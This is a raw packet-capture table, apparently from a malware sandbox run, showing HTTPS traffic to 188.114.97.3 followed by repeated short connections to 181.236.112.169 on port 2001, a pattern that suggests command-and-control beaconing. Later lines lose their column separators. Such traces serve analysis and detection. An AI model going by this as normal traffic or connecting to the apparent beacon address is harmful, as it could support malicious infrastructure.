Oct 31, 2024 07:41:20.087250948 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.087311029 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.115853071 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.116041899 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.199738979 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.199970007 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.204777956 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.204849005 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.205120087 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.205265045 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.205393076 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.205454111 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.206106901 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.206171036 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.234986067 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.235167980 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.319396019 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.319437981 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.319495916 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.319523096 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.319555044 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.319577932 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.324631929 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.324718952 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.324969053 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.325038910 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.325953007 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.326023102 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.443053961 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.443075895 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.443139076 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.443161964 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.443190098 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.443228960 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.473625898 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.473642111 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.473731995 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.473754883 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.473793983 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.473814964 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.562242985 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.562263012 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.562339067 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.562366009 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.562462091 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.634819984 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.634836912 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.635063887 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.635088921 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.635163069 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.681422949 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.681437016 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.681508064 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.681524992 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.681576967 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.795156956 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.795175076 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.795242071 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.795265913 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.795334101 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.800487041 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.800508022 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.800609112 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.800623894 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.800683975 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.913861990 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.913880110 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.913952112 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.913973093 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.914048910 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.919295073 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.919349909 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.919425011 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.919440031 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.919471979 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.919521093 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.949362040 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.949383020 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.949440956 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.949441910 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.949461937 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.949512005 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.038180113 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.038198948 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.038254023 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.038283110 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.038305998 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.039378881 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.068480015 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.068500996 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.068593025 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.068613052 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.068646908 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.070172071 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.157027006 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.157042980 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.157111883 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.157126904 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.157170057 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.187342882 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.187360048 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.187414885 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.187429905 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.187443972 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.187480927 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.271013975 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.271029949 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.271121979 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.271147966 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.271209955 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.276798964 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.276813984 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.276907921 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.276922941 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.276972055 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.306845903 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.306864977 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.306951046 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.306967020 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.307050943 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.395200014 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.395215988 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.395292997 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.395327091 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.395545006 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.425271034 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.425287008 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.425359964 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.425374031 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.425400019 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.425432920 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.510149002 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.510165930 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.510241985 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.510257959 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.510288954 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.510309935 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.514904976 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.514921904 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.514993906 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.515010118 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.515064001 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.544699907 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.544714928 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.544785023 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.544807911 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.544872046 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.629359961 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.629375935 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.629472971 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.629496098 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.629554033 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.634100914 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.634120941 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.634169102 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.634183884 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.634210110 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.634242058 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.663947105 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.663964033 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.664040089 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.664057016 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.664134026 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.751986027 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.752005100 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.752064943 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.752085924 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.752132893 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.752294064 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.752367020 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.752379894 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.752404928 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:21.752707958 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:21.752746105 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:22.025161982 CET | 49741 | 2001 | 192.168.2.4 | 181.236.112.169
Oct 31, 2024 07:41:22.030025005 CET | 2001 | 49741 | 181.236.112.169 | 192.168.2.4
Oct 31, 2024 07:41:22.030086040 CET | 49741 | 2001 | 192.168.2.4 | 181.236.112.169
Oct 31, 2024 07:41:22.031539917 CET | 49741 | 2001 | 192.168.2.4 | 181.236.112.169
Oct 31, 2024 07:41:22.036432981 CET | 2001 | 49741 | 181.236.112.169 | 192.168.2.4
Oct 31, 2024 07:41:22.588283062 CET | 2001 | 49741 | 181.236.112.169 | 192.168.2.4
Oct 31, 2024 07:41:22.588918924 CET | 49741 | 2001 | 192.168.2.4 | 181.236.112.169
Oct 31, 2024 07:41:22.588977098 CET | 49741 | 2001 | 192.168.2.4 | 181.236.112.169
Oct 31, 2024 07:41:22.593815088 CET | 2001 | 49741 | 181.236.112.169 | 192.168.2.4
Oct 31, 2024 07:41:23.604532957 CET | 49742 | 2001 | 192.168.2.4 | 181.236.112.169
Oct 31, 2024 07:41:23.609563112 CET | 2001 | 49742 | 181.236.112.169 | 192.168.2.4
Oct 31, 2024 07:41:23.609636068 CET | 49742 | 2001 | 192.168.2.4 | 181.236.112.169
Oct 31, 2024 07:41:23.610044956 CET | 49742 | 2001 | 192.168.2.4 | 181.236.112.169
                                                                                              Oct 31, 2024 07:41:23.614911079 CET200149742181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:24.168287039 CET200149742181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:24.168349981 CET497422001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:24.168405056 CET497422001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:24.173141956 CET200149742181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:25.182823896 CET497432001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:25.187647104 CET200149743181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:25.190184116 CET497432001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:25.190505981 CET497432001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:25.195275068 CET200149743181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:25.740830898 CET200149743181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:25.740895033 CET497432001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:25.740942001 CET497432001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:25.745733023 CET200149743181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:26.749363899 CET497442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:26.754239082 CET200149744181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:26.754323006 CET497442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:26.756293058 CET497442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:26.761130095 CET200149744181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:27.304760933 CET200149744181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:27.304835081 CET497442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:27.304883957 CET497442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:27.309730053 CET200149744181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:28.307629108 CET497452001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:28.312520027 CET200149745181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:28.312591076 CET497452001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:28.312937975 CET497452001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:28.317709923 CET200149745181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:28.864036083 CET200149745181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:28.864114046 CET497452001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:28.864193916 CET497452001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:28.869400024 CET200149745181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:29.870443106 CET497462001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:29.875329971 CET200149746181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:29.875406981 CET497462001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:29.875749111 CET497462001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:29.880619049 CET200149746181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:30.432914972 CET200149746181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:30.432971954 CET497462001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:30.433022976 CET497462001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:30.437979937 CET200149746181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:31.448164940 CET497472001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:31.453205109 CET200149747181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:31.453289032 CET497472001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:31.453622103 CET497472001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:31.458539963 CET200149747181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:32.267869949 CET200149747181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:32.268239021 CET200149747181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:32.268377066 CET497472001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:32.270159006 CET497472001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:32.275755882 CET200149747181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:33.276213884 CET497482001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:33.952852011 CET200149748181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:33.953041077 CET497482001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:33.953404903 CET497482001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:33.958151102 CET200149748181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:34.511995077 CET200149748181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:34.512077093 CET497482001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:34.512109995 CET497482001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:34.516871929 CET200149748181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:35.526367903 CET497492001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:35.531337023 CET200149749181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:35.531415939 CET497492001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:35.531714916 CET497492001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:35.536592960 CET200149749181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:36.089909077 CET200149749181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:36.089992046 CET497492001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:36.090048075 CET497492001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:36.094959021 CET200149749181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:37.104551077 CET497502001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:37.109517097 CET200149750181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:37.109621048 CET497502001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:37.109960079 CET497502001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:37.114736080 CET200149750181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:37.660305023 CET200149750181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:37.660368919 CET497502001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:37.660439968 CET497502001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:37.665868998 CET200149750181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:38.669819117 CET497512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:38.675028086 CET200149751181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:38.675110102 CET497512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:38.675447941 CET497512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:38.680250883 CET200149751181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:39.217823029 CET200149751181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:39.217925072 CET497512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:39.217998981 CET497512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:39.222918034 CET200149751181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.229500055 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.234428883 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.234508991 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.234870911 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.239650011 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.791227102 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.791296005 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.791347980 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.796232939 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:41.811675072 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:41.816620111 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:41.816720963 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:41.817111015 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:41.821892977 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:42.375575066 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:42.375711918 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:42.375822067 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:42.380671978 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.385826111 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.390852928 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.390950918 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.391319036 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.396087885 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.950627089 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.950701952 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.950783968 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.955574036 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:44.963911057 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:44.968933105 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:44.969012022 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:44.969399929 CET497552001192.168.2.4181.236.112.169
